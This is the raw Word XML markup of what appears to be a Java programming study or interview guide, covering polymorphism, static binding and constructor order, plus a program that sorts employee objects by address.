    <w:p w14:paraId="65B4906E" w14:textId="77777777" w:rsidR="003E5945" w:rsidRPr="00CE4B95" w:rsidRDefault="003E5945" w:rsidP="003E59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child method ml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B15A653" w14:textId="77777777" w:rsidR="003E5945" w:rsidRPr="00CE4B95" w:rsidRDefault="003E5945" w:rsidP="003E59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parent method m2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="689A9A3D" w14:textId="77777777" w:rsidR="003E5945" w:rsidRPr="00CE4B95" w:rsidRDefault="003E5945" w:rsidP="003E59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child method ml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E1BF912" w14:textId="77777777" w:rsidR="003E5945" w:rsidRPr="00CE4B95" w:rsidRDefault="003E5945" w:rsidP="003E59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parent method m2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="622ED206" w14:textId="77777777" w:rsidR="003E5945" w:rsidRPr="00CE4B95" w:rsidRDefault="003E5945" w:rsidP="003E594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Concepts:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="393C09A5" w14:textId="77777777" w:rsidR="003E5945" w:rsidRPr="00CE4B95" w:rsidRDefault="003E5945">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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tance Methods and Runtime Polymorphism</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: When a method is called on an object, the actual method that gets invoked depends on the object type (not the reference type). Hence, even though the reference is of type Parent, ml() calls the Child's version when the object is a Child. This is runtime polymorphism.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F4AD422" w14:textId="77777777" w:rsidR="003E5945" w:rsidRPr="00CE4B95" w:rsidRDefault="003E5945">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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ic Methods and Compile-Time Binding</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Static methods are bound at compile time, meaning the method that gets called depends on the reference type, not the object type. Therefore, m2() always calls the Parent class's static method when the reference is of type Parent, regardless of the object being a Child.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D51D673" w14:textId="2E892967" w:rsidR="003E5945" w:rsidRPr="00CE4B95" w:rsidRDefault="003E5945">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="302"/>
        </w:numPr>
        <w:jc w:val="both"/>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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Constructor Behavior</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: When creating an instance of Child, the Parent constructor is called first due to the super() invocation in the Child constructor (implicitly if not explicitly written).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48683134" w14:textId="77777777" w:rsidR="003E5945" w:rsidRPr="00CE4B95" w:rsidRDefault="003E5945" w:rsidP="003E5945">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0CDE1433" w14:textId="0A2EA50E" w:rsidR="005A767B" w:rsidRPr="00CE4B95" w:rsidRDefault="005A767B">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="371" w:name="_Toc196307851"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">Program – </w:t>
      </w:r>
      <w:r w:rsidR="00CC6E85" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Code to add into the list and it should sort on the basis Address</w:t>
      </w:r>
      <w:bookmarkEnd w:id="371"/>
    </w:p>
    <w:p w14:paraId="3EB9B268" w14:textId="0A4F21AA" w:rsidR="005A767B" w:rsidRPr="00CE4B95" w:rsidRDefault="005A767B" w:rsidP="005A767B">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">Problem Definition: </w:t>
      </w:r>
      <w:r w:rsidR="00AD5CB3" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Write a code to add into the list and it should sort on the basis Address?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48EF859F" w14:textId="77777777" w:rsidR="00B44E2B" w:rsidRPr="00CE4B95"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CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000088"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>class</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Emp</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27E5F0AA" w14:textId="77777777" w:rsidR="00B44E2B" w:rsidRPr="00CE4B95"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id</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str nam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Address</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve"> addr</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B4E83AC" w14:textId="77777777" w:rsidR="00B44E2B" w:rsidRPr="00CE4B95"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Emp</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id</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name</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addr</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id</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thi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id</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name </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thi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name</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thi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addr</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addr</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E1E3620" w14:textId="77777777" w:rsidR="00B44E2B" w:rsidRPr="00CE4B95"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780F3EE4" w14:textId="77777777" w:rsidR="00B44E2B" w:rsidRPr="00CE4B95"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class</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve"> test</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BECA5CA" w14:textId="77777777" w:rsidR="00B44E2B" w:rsidRPr="00CE4B95"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Emp</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve"> e1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Emp</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1</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A'</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pune'</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40A1250D" w14:textId="77777777" w:rsidR="00B44E2B" w:rsidRPr="00CE4B95"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Emp</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve"> e2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Emp</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1</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A'</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nagpur'</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01174881" w14:textId="77777777" w:rsidR="00B44E2B" w:rsidRPr="00CE4B95"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75453C1A" w14:textId="77777777" w:rsidR="00B44E2B" w:rsidRPr="00CE4B95"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62EFB8A1" w14:textId="3FBA1C00" w:rsidR="00B44E2B" w:rsidRPr="00CE4B95"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Emp</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve"> e100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Emp</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1</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A'</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zz'</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74FE1D5D" w14:textId="6FA7368F" w:rsidR="005A767B" w:rsidRPr="00CE4B95" w:rsidRDefault="005A767B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12B47D9D" w14:textId="77777777" w:rsidR="0031605C" w:rsidRPr="00CE4B95" w:rsidRDefault="0031605C" w:rsidP="0031605C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B622B65"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88"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>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p>
    <w:p w14:paraId="40279C21"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A9D810B"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76C61C8"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d</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33F006E1"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1A44BBAF"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address</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59E0E929"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="245DB9C4"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onstructor to initialize Emp object</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AAC4EF3"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addres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F5D8356"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d</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="418469E3"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0FDEF5D2"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addres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ddress</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77893049"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50E46CB"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FBED7B3"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Getter method for Address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0765D4D5"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getAddres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8A2AAF2"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address</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4384EF43"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DDBC603"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="534857C7"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verride toString() for easy printing of Emp objects</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="195C3C58"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0283C7A7"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to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48EF051"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Emp{i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nam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addre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ddres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666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AA61211"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0100152"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666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="610F9D40"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F1080C2"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es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7286A85"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48B3433"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e Emp objects</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B5E7818"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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> e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Pune"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72321C50"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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> e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Nagpur"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="077522FA"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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> e3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Mumbai"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33CB7250"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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> e4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4</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Delhi"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EED4852"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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> e5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ZZ"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FFC42CA"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B9B006B"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Add Emp objects to a list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="646BFC2F"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Emp</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empLis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List</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&lt;&gt;();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DB685D2"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empLis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1</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E388E98"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empLis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2</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AC35E18"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empLis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3</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13FDA8BF"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empLis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4</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="053F5BB1"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empLis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5</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AAD4088"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13919A32"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ort the list based on the Address field</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53D51C25"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emp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or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omparat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mparing</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Em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Address</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31A5A92F"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B583F93"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Print the sorted list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="438BB987"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orted list based on Address:"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="625942B0"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Emp</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> emp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mp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5604131"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mp</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28B1B3D1"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44C298C" w14:textId="77777777"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F8A3C36" w14:textId="63F6B645" w:rsidR="0031605C" w:rsidRPr="00CE4B95"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223736B6" w14:textId="77777777" w:rsidR="0031605C" w:rsidRPr="00CE4B95" w:rsidRDefault="0031605C" w:rsidP="0031605C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="124AC5AA" w14:textId="291A617C" w:rsidR="005A767B" w:rsidRPr="00CE4B95" w:rsidRDefault="005A767B">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="372" w:name="_Toc196307852"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">Program – </w:t>
      </w:r>
      <w:r w:rsidR="00807B1E" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is the output</w:t>
      </w:r>
      <w:bookmarkEnd w:id="372"/>
    </w:p>
    <w:p w14:paraId="598DC7F9" w14:textId="38577BDA" w:rsidR="005A767B" w:rsidRPr="00CE4B95" w:rsidRDefault="005A767B" w:rsidP="005A767B">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">Problem Definition: </w:t>
      </w:r>
      <w:r w:rsidR="00812948" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>What is the output?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E1F974D" w14:textId="77777777" w:rsidR="00A05A6F" w:rsidRPr="00CE4B95"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CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000088"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>publ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class</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Employee</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6CFC2DCD" w14:textId="77777777" w:rsidR="00A05A6F" w:rsidRPr="00CE4B95"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id</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String</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve"> name</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21760098" w14:textId="77777777" w:rsidR="00A05A6F" w:rsidRPr="00CE4B95"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Employee</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id</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String</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
